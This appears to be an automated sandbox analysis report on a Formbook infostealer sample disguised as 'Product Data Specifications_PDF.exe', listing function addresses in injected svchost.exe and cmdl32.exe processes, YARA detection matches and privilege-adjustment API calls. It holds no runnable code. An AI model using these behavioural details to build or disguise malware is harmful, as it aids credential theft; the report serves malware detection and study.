Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004169DE 9_2_004169DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004169E3 9_2_004169E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0041699C 9_2_0041699C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00410263 9_2_00410263
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0040E2E3 9_2_0040E2E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004022A0 9_2_004022A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0042EED3 9_2_0042EED3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00402E80 9_2_00402E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FA352 9_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364E3F0 9_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_037003E6 9_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0274 9_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C02C0 9_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C8158 9_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630100 9_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DA118 9_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F81CC 9_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F41A2 9_2_036F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_037001AA 9_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D2000 9_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640770 9_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03664750 9_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363C7C0 9_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365C6E0 9_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640535 9_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03700591 9_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F2446 9_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E4420 9_2_036E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EE4F6 9_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FAB40 9_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F6BD7 9_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363EA80 9_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03656962 9_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0370A9A6 9_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364A840 9_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03642840 9_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366E8F0 9_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036268B8 9_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B4F40 9_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03682F28 9_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03660F30 9_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E2F30 9_2_036E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364CFE0 9_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03632FC8 9_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BEFA0 9_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640E59 9_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FEE26 9_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FEEDB 9_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03652E90 9_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FCE93 9_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364AD00 9_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DCD1F 9_2_036DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363ADE0 9_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03658DBF 9_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03640C00 9_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03630CF2 9_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E0CB5 9_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362D34C 9_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F132D 9_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0368739A 9_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E12ED 9_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365B2C0 9_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036452A0 9_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367516C 9_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362F172 9_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0370B16B 9_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0364B1B0 9_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F70E9 9_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FF0E0 9_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EF0CC 9_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036470C0 9_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FF7B0 9_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03685630 9_2_03685630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F16CC 9_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F7571 9_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_037095C3 9_2_037095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DD5B0 9_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03631460 9_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FF43F 9_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FFB76 9_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B5BF0 9_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367DBF9 9_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365FB80 9_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B3A6C 9_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FFA49 9_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F7A46 9_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036EDAC6 9_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036DDAAC 9_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03685AA0 9_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036E1AA3 9_2_036E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03649950 9_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365B950 9_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D5910 9_2_036D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AD800 9_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036438E0 9_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FFF09 9_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FFFB1 9_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03641F92 9_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03649EB0 9_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F7D73 9_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03643D40 9_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036F1D5A 9_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0365FDC0 9_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B9C32 9_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FFCF2 9_2_036FFCF2
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EAE4F6 12_2_04EAE4F6
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB2446 12_2_04EB2446
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EA4420 12_2_04EA4420
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EC0591 12_2_04EC0591
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E00535 12_2_04E00535
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E1C6E0 12_2_04E1C6E0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DFC7C0 12_2_04DFC7C0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E00770 12_2_04E00770
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E24750 12_2_04E24750
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E92000 12_2_04E92000
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB81CC 12_2_04EB81CC
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EC01AA 12_2_04EC01AA
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB41A2 12_2_04EB41A2
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E88158 12_2_04E88158
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DF0100 12_2_04DF0100
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E9A118 12_2_04E9A118
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E802C0 12_2_04E802C0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EA0274 12_2_04EA0274
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EC03E6 12_2_04EC03E6
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E0E3F0 12_2_04E0E3F0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBA352 12_2_04EBA352
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DF0CF2 12_2_04DF0CF2
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EA0CB5 12_2_04EA0CB5
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E00C00 12_2_04E00C00
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DFADE0 12_2_04DFADE0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E18DBF 12_2_04E18DBF
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E0AD00 12_2_04E0AD00
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E9CD1F 12_2_04E9CD1F
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBEEDB 12_2_04EBEEDB
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E12E90 12_2_04E12E90
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBCE93 12_2_04EBCE93
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E00E59 12_2_04E00E59
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBEE26 12_2_04EBEE26
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E0CFE0 12_2_04E0CFE0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DF2FC8 12_2_04DF2FC8
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E7EFA0 12_2_04E7EFA0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E74F40 12_2_04E74F40
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E42F28 12_2_04E42F28
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E20F30 12_2_04E20F30
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EA2F30 12_2_04EA2F30
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E2E8F0 12_2_04E2E8F0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DE68B8 12_2_04DE68B8
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E0A840 12_2_04E0A840
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E02840 12_2_04E02840
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E029A0 12_2_04E029A0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04ECA9A6 12_2_04ECA9A6
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E16962 12_2_04E16962
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DFEA80 12_2_04DFEA80
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB6BD7 12_2_04EB6BD7
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBAB40 12_2_04EBAB40
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DF1460 12_2_04DF1460
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBF43F 12_2_04EBF43F
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EC95C3 12_2_04EC95C3
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E9D5B0 12_2_04E9D5B0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB7571 12_2_04EB7571
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB16CC 12_2_04EB16CC
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E45630 12_2_04E45630
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBF7B0 12_2_04EBF7B0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB70E9 12_2_04EB70E9
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBF0E0 12_2_04EBF0E0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E070C0 12_2_04E070C0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EAF0CC 12_2_04EAF0CC
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E0B1B0 12_2_04E0B1B0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04ECB16B 12_2_04ECB16B
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E3516C 12_2_04E3516C
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DEF172 12_2_04DEF172
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EA12ED 12_2_04EA12ED
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E1B2C0 12_2_04E1B2C0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E052A0 12_2_04E052A0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E4739A 12_2_04E4739A
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DED34C 12_2_04DED34C
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB132D 12_2_04EB132D
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBFCF2 12_2_04EBFCF2
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E79C32 12_2_04E79C32
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E1FDC0 12_2_04E1FDC0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB7D73 12_2_04EB7D73
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E03D40 12_2_04E03D40
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB1D5A 12_2_04EB1D5A
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E09EB0 12_2_04E09EB0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBFFB1 12_2_04EBFFB1
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E01F92 12_2_04E01F92
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBFF09 12_2_04EBFF09
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E038E0 12_2_04E038E0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E6D800 12_2_04E6D800
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E09950 12_2_04E09950
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E1B950 12_2_04E1B950
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E95910 12_2_04E95910
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EADAC6 12_2_04EADAC6
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E45AA0 12_2_04E45AA0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E9DAAC 12_2_04E9DAAC
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EA1AA3 12_2_04EA1AA3
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E73A6C 12_2_04E73A6C
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBFA49 12_2_04EBFA49
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EB7A46 12_2_04EB7A46
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E75BF0 12_2_04E75BF0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E3DBF9 12_2_04E3DBF9
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E1FB80 12_2_04E1FB80
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04EBFB76 12_2_04EBFB76
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA2020 12_2_02BA2020
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02B9CF37 12_2_02B9CF37
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02B9CF40 12_2_02B9CF40
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02B9B1E0 12_2_02B9B1E0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02B9D160 12_2_02B9D160
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA5700 12_2_02BA5700
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA3899 12_2_02BA3899
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA38E0 12_2_02BA38E0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA38DB 12_2_02BA38DB
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BBBDD0 12_2_02BBBDD0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04C1E423 12_2_04C1E423
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04C1E7BC 12_2_04C1E7BC
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04C1E306 12_2_04C1E306
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04C1D828 12_2_04C1D828
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04C1E94D 12_2_04C1E94D
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0362B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03687E54 appears 111 times
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: String function: 00445AE0 appears 65 times
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: String function: 04E6EA12 appears 86 times
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: String function: 04E35130 appears 58 times
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: String function: 04E47E54 appears 111 times
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: String function: 04DEB970 appears 277 times
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: String function: 04E7F290 appears 105 times
Source: Product Data Specifications_PDF.exe, 00000006.00000003.1378998352.000000000490D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Product Data Specifications_PDF.exe
Source: Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004763000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Product Data Specifications_PDF.exe
Source: Product Data Specifications_PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@8/6
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044AF6C GetLastError,FormatMessageW, 6_2_0044AF6C
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 6_2_004333BE
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 6_2_00464EAE
